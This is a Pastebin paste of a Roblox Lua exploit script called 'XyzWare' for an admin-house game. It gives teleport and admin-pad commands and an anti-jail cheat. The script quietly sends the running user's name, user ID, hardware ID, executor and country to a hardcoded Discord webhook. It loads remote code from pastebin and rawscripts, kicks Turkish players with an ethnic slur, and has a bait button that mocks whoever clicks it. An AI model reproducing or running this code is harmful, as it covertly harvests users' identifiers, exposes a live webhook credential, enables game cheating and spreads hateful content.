Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --cmds
- local user = game.Players.LocalPlayer.DisplayName
- local user2 = game.Players.LocalPlayer.Name
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = "Welcome "..user.." ("..user2..") to XyzCmds";
- Color = Color3.new(0, 0, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = "Perfix is , (comma)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",house" then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(x, 28.3, 82.4)
- x = x - 4
- wait(0.01)
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",pads" then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(x, 28.3, 106.4)
- x = x - 4
- wait(0.01)
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",spawn" then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(x, 20, -42)
- x = x - 4
- wait(0.01)
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",hop" then game.Players:Chat("!newserver")
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",obby" then local ltg = game.Lighting
- local sp = game.workspace.SecureParts
- if sp:FindFirstChild("Lava") then sp.Lava.Parent = ltg
- elseif ltg:FindFirstChild("Lava") then ltg.Lava.Parent = sp
- end
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",pc" then game.Players:Chat(":partcount")
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",rj" then game.Players:Chat("!rejoin")
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",antipunish" then
- game.Lighting.ChildAdded:Connect(function(v)
- if v.Name and v.Name == game.Players.LocalPlayer.DisplayName then
- game.Players:Chat(":unpunish me")
- end
- end)
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",antijail" then
- local plr = game.Players.LocalPlayer.Name
- game.workspace.ChildAdded:Connect(function(v)
- if v.Name and v.Name == ""..plr.."_ADONISJAIL" then
- game.Players:Chat(":free")
- end
- end)
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",clean" then game.Players:Chat(":free all | :starterremove all all | :re all | :music | :uncharaudio all | :clr | :clrt | :wait 1 | :flynoclip | :f3x | :god all | :ff all")
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",admin" then
- workspace.CurrentCamera.CameraType = Enum.CameraType.Scriptable
- local hrp = game.Players.LocalPlayer.Character.HumanoidRootPart
- local PlrPos = hrp.CFrame
- local AdminPadPos= 13.6
- for I = 1, 9, 1 do
- hrp.CFrame = CFrame.new(AdminPadPos, 26.5, 105.5)
- AdminPadPos = AdminPadPos - 4
- task.wait(0)
- end
- hrp.CFrame = PlrPos
- workspace.CurrentCamera.CameraType = Enum.CameraType.Track
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",reset" then
- local plr = game.Players
- local plr2 = game.Players.LocalPlayer
- local hrp = game.Players.LocalPlayer.Character.HumanoidRootPart
- local PlrPos = hrp.CFrame
- for I = 1, 2, 1 do
- hrp.CFrame = CFrame.new(22, 28.5, 105.5)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- end
- hrp.CFrame = PlrPos
- end
- end)
- game.Players.LocalPlayer.Chatted:Connect(function(msg)
- if msg == ",cmds" then
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",house (Tps you to the admin house)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",spawn (Tps you to spawn kinda useless)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",reset (resets admin)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",pads (Tps you infornt of the pads)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",admin (Gets you admin)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",pc (just partcount I needed that ;-;)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",clean (cleans the server I tried)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",hop (server hop)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",antipunish";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",antijail";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",rj (rejoin)";
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- game.StarterGui:SetCore("ChatMakeSystemMessage", {
- Text = ",obby (delete and restores the obby)" ;
- Color = Color3.new(0, 1, 1);
- Font = Enum.Font.Cartoon;
- FontSize = Enum.FontSize.Size24;
- })
- end
- end)
- --local things to make it ez to code
- local ExploitName if syn then ExploitName = "Delta or codex idk"; elseif game.CoreGui:FindFirstChild("Codex") then ExploitName = "Codex"; elseif game.CoreGui:FindFirstChild("Cryptic") then ExploitName = "Cryptic"; elseif game.CoreGui:FindFirstChild("Delta") then ExploitName = "Delta"; elseif KRNL_LOADED then ExploitName = "KRNL"; elseif getexecutorname then ExploitName = "Script-Ware"; elseif IsElectron then ExploitName = "Electron"; elseif FLUXUS_LOADED then ExploitName = "Fluxus"; elseif hookfunction_raw and hmjdfk then ExploitName = "Fluxus (MacOS)"; elseif shadow_env then ExploitName = "Shadow"; elseif is_sirhurt_closure then ExploitName = "Sirhurt"; elseif WRDAPI then ExploitName = "WeAreDes (WRD)"; elseif SENTINEL_LOADED then ExploitName = "SENTINEL"; elseif PROTOSMASHER_LOADED then ExploitName = "ProtoSmasher"; elseif isvm then ExploitName = "Proxo"; elseif IS_VIVA_LOADED then ExploitName = "VIVA"; elseif IS_COCO_LOADED then ExploitName = "Coco"; elseif jit then ExploitName = "EasyExploits"; elseif CalamariLuaEnv then ExploitName = "Calamari"; elseif unit then ExploitName = "Unit"; else ExploitName = "Unknown"; end;
- local me = game.Players.LocalPlayer
- local a = game.Players.LocalPlayer.UserId
- local HWID = game:GetService("RbxAnalyticsService"):GetClientId()
- local LocalizationService = game:GetService("LocalizationService")
- local country = LocalizationService:GetCountryRegionForPlayerAsync(me)
- if country == "TR" then game.Players.LocalPlayer:Kick("Turkish scum") end
- local ws = game.workspace
- local sparts = ws.SecureParts local Plrs = game.Players local LPlr = Plrs.LocalPlayer
- local Char = LPlr.Character local hrp = Char.HumanoidRootPart local APads = sparts.AdminPads
- local RPads = sparts.ResetPads local name = game.Players.LocalPlayer.Name
- local dname = LPlr.DisplayName
- -- WEBHOOK
- local XyzUser = Game.Players.LocalPlayer.Name
- local XyzUser2 = game.Players.LocalPlayer.DisplayName
- function sm(url, message)
- local http = game:GetService("HttpService");
- local hd = {["Content-Type"]="application/json"};
- local data = {content=message};
- local b = http:JSONEncode(data);
- local response = request({Url=url,Method="POST",Headers=hd,Body=b});
- end
- function sme(url, embed)
- local http = game:GetService("HttpService");
- local hd = {["Content-Type"]="application/json"};
- local data = {embeds={{title=embed.title,description=embed.description,color=embed.color,fields=embed.fields,footer={text=embed.footer.text}}}};
- local b = http:JSONEncode(data);
- local response = request({Url=url,Method="POST",Headers=hd,Body=b});
- end
- local u = "https://discord.com/api/webhooks/1272126135794274366/HAdRp3IfACaUX_3-aATcb5AgHzwblurMkVDr_bkS4CFdG7Ld7V0eUct0O3t0y5QSj11o";
- sm(u, "");
- local embed = {color=16711680,fields={{name="User",value=""..XyzUser2.." ("..XyzUser..") Executor = "..ExploitName.." | Player id = "..a.." |HWID= "..HWID.." | from "..country..""}},footer={text="Has Loaded XyzWare AH lite"}};
- sme(u, embed);
- -- GUI FUNCS
- local User = game.Players.LocalPlayer.DisplayName
- local lib = loadstring(game:HttpGet("https://pastebin.com/raw/Zgybf9xw"))()
- lib:SetIcon("http://www.roblox.com/asset/?id=18742568685")
- lib:SetTheme("Default")
- lib:SetTitle("Welcome, "..User.." to XyzWare")
- -- GUI BUTTONS
- lib:AddButton("TpPads", function()
- workspace.CurrentCamera.CameraType = Enum.CameraType.Scriptable
- local hrp = game.Players.LocalPlayer.Character.HumanoidRootPart
- local PlrPos = hrp.CFrame
- local AdminPadPos= 13.6
- for I = 1, 9, 1 do
- hrp.CFrame = CFrame.new(AdminPadPos, 26.5, 105.5)
- AdminPadPos = AdminPadPos - 4
- task.wait(0)
- end
- hrp.CFrame = PlrPos
- workspace.CurrentCamera.CameraType = Enum.CameraType.Track
- end)
- lib:AddButton("Tphouse", function()
- game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-2, 28, 81)
- end)
- lib:AddButton("ResetPads", function()
- local plr = game.Players
- local plr2 = game.Players.LocalPlayer
- local hrp = game.Players.LocalPlayer.Character.HumanoidRootPart
- local PlrPos = hrp.CFrame
- for I = 1, 2, 1 do
- hrp.CFrame = CFrame.new(22, 28.5, 105.5)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- fireclickdetector(game.workspace.SecureParts.ResetPads.ClickDetector)
- task.wait(0)
- end
- hrp.CFrame = PlrPos
- end)
- lib:AddButton("Free robux and 8 yr old baddies", function()
- game.Players.LocalPlayer.Character.Head:Destroy()
- game.Players:Chat(":npm me Lil bro ur down bad")
- local user = game.Players.LocalPlayer.DisplayName
- game.Players:Chat(":Chatnotifyc all 220 0 70 "..user.." Has pressed the `8 yr old b4ddies` button in a exploit gui, Make fun of him.")
- wait(3)
- game.Players:Chat(":re | :wait 0.1 |:jump")
- game.Players:Chat(":fview all me")
- task.wait(3)
- game.Players:Chat(":rv all")
- end)
- lib:AddToggle("White screen to not get crashed!1!", function(state)
- if state then
- game:GetService("RunService"):Set3dRenderingEnabled(false)
- else
- game:GetService("RunService"):Set3dRenderingEnabled(true)
- end
- end, false)
- lib:AddToggle("Obby on/off", function(state)
- if state then
- sparts.Lava.Parent = game.Lighting
- else
- game.Lighting.Lava.Parent = sparts
- end
- end, false)
- lib:AddButton("Dex Explorer", function()
- loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-DARK-DEX-V3-MOBILE-17318"))()
- end)
- lib:AddButton("RemoteSpy Mobile", function()
- loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Remote-Spy-Mobile-15197"))()
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement